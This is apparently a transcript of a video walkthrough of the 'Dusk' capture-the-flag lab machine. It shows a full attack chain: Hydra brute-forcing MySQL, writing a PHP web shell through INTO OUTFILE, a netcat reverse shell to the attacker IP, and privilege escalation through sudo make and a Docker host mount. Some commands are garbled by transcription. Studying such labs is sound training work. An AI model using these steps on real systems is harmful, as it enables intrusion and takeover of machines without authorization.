Alright everyone, welcome back, and I'm back with another CTF, which is a Dusk Sunset Dusk. Okay, so I have already booted up my machines, so let's start. Okay, so we're gonna just find out the IP addresses of our victim machines. We're gonna use net discover. Okay, okay, we got the IP address of the victim machines. Alright, so we're gonna further enumerate its port by using nmap command. Okay, then let's see how many ports are open. Okay, there is a port 8080 open and 3306 open, port 80 also open, port 25 is also been open, port 22 and port 21. Okay, so let's further first check port 80. Okay, port 80. Alright, it doesn't showing anything. It's just a Apache index page, Apache's server index page. Okay, see, and here it's showing the directory var www html index.html. So it's an index page of Apache web server default page. Okay, and let's see any another port. Port 8080. Okay, I'm gonna check port 8080. All right, we have got something. Files have been there, some image file index.php files on van.php. If you're gonna check van.jpeg, let's see, it's a image file. All right, the Vinci file .jpg, and look, we got something interesting. We got a directory. It's a open directory means we can write files into this directory. Okay, it's a local working directory, and it's been open and it's showing over here. Means we can write our shell in this directory. Okay, so this is our first hint, and the second hint, let's see. Okay, the MySQL has been open. Okay, MySQL has been open, so let's enumerate the MySQL. We'll use the Hydra to get the password of MySQL because this port is open. Okay, so we're gonna check from here whether it is working or not, whether we get or not the password. we're gonna use the command hydra space -l space root. Okay, basically default is root, so we're gonna take the default IP address as a root. Then -p space slash user slash share slash word list slash rocku.txt. Okay, and the victim IP address and which one we have to brute force MySQL. Hydra space L root user share word list rocku.txt. Okay, yep. So we got the MySQL address of we got the root password of MySQL. So we're gonna log in inside MySQL. So MySQL -u space -h space 192.168.2.3 host. Password is password, copy and then paste, hit enter. Okay, so we are in the MySQL database. So first we're gonna show bases. Select, we're gonna check anything inside this database or not. Select tables from SQL. Okay, tables. Nothing. Okay, so what we're gonna do is we're gonna try to execute our shell inside this temp file. Okay, so what we can do, we can use into out file of SQL database. Okay, inside SQL database, so we can simply type the PHP shell we have to write inside the /var/temp. So we're gonna use select PHP space system $_git cmd. Okay, it's a PHP script to get the shell, as we all know that PHP can interact with system command. Okay, alright, then into out file slash var slash temp slash and a file name, anything like shell, no shell, like exec dot php. Alright, and hit enter. See, one query, okay, one row affected. So we'll gonna back to our browser and we'll gonna check with port 8080 and we're gonna see, yes, exe.php is working, has been inserted. So what we're gonna do, we're gonna execute this php, execute.php. so exec.php question mark and cmd command is equal to id. We're gonna check whether it's working or not. It's not working. Why? exec.php. okay, c dot php cmd equal to id. Not working. Why? Let me check my stem. Okay, okay, I have just slightly mistake that php tag I haven't given, and I'm gonna change the file name exe.php. okay, is everything is alright. Let me check once again. Select this system $get cmd, okay, into out file slash var slash temp slash exe.php. okay, one query is affected and we're gonna check it again. See, exe, a new file, php file has been created. So we're gonna execute this exec.php question mark cmd is equal to id. What's going on? php.cmd is equal to id. What? Where I'm committing mistakes? Let me check once again. Select. Okay, this is okay. php sys system underscore dollar underscore get cmd. Everything is okay. Then into out file slash var slash temp slash php.exe, that the things is okay. So where I'm committing mistakes, Let me recheck it once again. Select CLECT. Select system. Everything is okay. Slash where slash temp. That's fine. Then it's not. Why it's not temp folder? That's okay. Then why it's not working? Okay, we're gonna change with any another name like raj.php. Select the system. Into out file. Okay, we're gonna check this once again. Okay, the raj.php has been created. Now check raj.php question mark cmd equal to id. Okay, now it's worked, so it give me the id of the user. Okay, so what we gonna do next is we have to get the shell. Okay, so first I'm just using the netcat command on my attacking machines to listen, which is nc space hyphen lvp and the port, any port you want to open. So what we can do over here, we can use the command to get the reverse shell. We can use the command is nc space hyphen e space slash bin bash space 192.168.2.4 space the port 1. It's a attacker machine IP. Okay, this IP address is a attacker machine IP. This. Okay, so don't get confused about attacker and victim. It's a attacker machine IP means what this gonna use, it will open a port on this IP address. Okay, it will open a port and give the connection on this IP address on using with this port. So just using hit enter and see what I got the connections from 192.168.2.3, that the victim IP address. And if I gonna use ls list, see it's working. So to get the bash, gonna use Python command, Python 3 space hyphen c port pty colon pty dot spawn bin bash. Okay, so if I check id, the id is this. So gonna use what? Use the root permission. We're gonna check sudo space hyphen l. Okay, so this user has the permission of Dusk. Okay, this user can execute this command of Dusk, this and ping. So if we see, it is a ping, okay, SL and a make. So ping, which we doesn't know much anything about, okay, what, how to get shell or SL, but there is an interesting thing called make. Okay, we can use this makes for privilege escalations. Alright, so what we're gonna do is, first of all, we're gonna create a variable. Okay, and inside that variable we're gonna give bin sh, sorry. Okay, and then we're gonna use make command to execute this variable, command variable. Okay, so let's start. So the command will be sudo hyphen u dusk space make space hyphen s space dash eval is equal to dollar this x colon forward slash n forward slash t hyphen, this will close, and dollar command. Okay, so this will escalate the privilege and it will give the bash of Dusk. So just hit enter. Okay, maybe I have done something. Okay, I just committed a mistake. I should use okay Dusk space dash okay, mistake. Okay, so we got the terminal shell bash. Check ID. So here we got the ID and see what is saying. It's a Docker. It's a group Docker. So we can use Docker for further privilege escalations to get the root. Okay, so what we're gonna do is we're gonna run the Docker to get the root shell. Okay, can use to escalate the privileges. So we're gonna use Docker space v space run forward slash colon forward slash host os minus I space hyphen t space Chris Foss daily slash root. Okay, yep. Okay, invalid reference format. I think I'm just done something mistakes. Let me check once again. Docker hyphen v space root colon host Chris Fosterly. Okay, I just mistakes. Chris Foss. So this will be RE. I just mistake, so nothing to worry. Docker hyphen space one space forward slash this host os space hyphen I space hyphen t slash root. Please. Oh, hyphen t hyphen t. Hyphen I space hyphen t space. What's going on? Why it's giving error? All the commands are okay. Then why? Gonna check again. Okay, I'm doing a mistake. Docker run space v. I remember. Okay, let's see what happened. Unable to find the image. Downloading. Okay. Okay. So see, we have got the root shell on our host, and if we see the ID, yep, it's a root ID. Okay, so we're gonna move into the root directory, and we're gonna get the root.txt. Yep, we got the flag. Okay, so this is how we can get the root privilege by using the docker command, as we have seen just before. So till then, thank you, and we'll gonna solve another CTF video in the next video. So till then, thank you.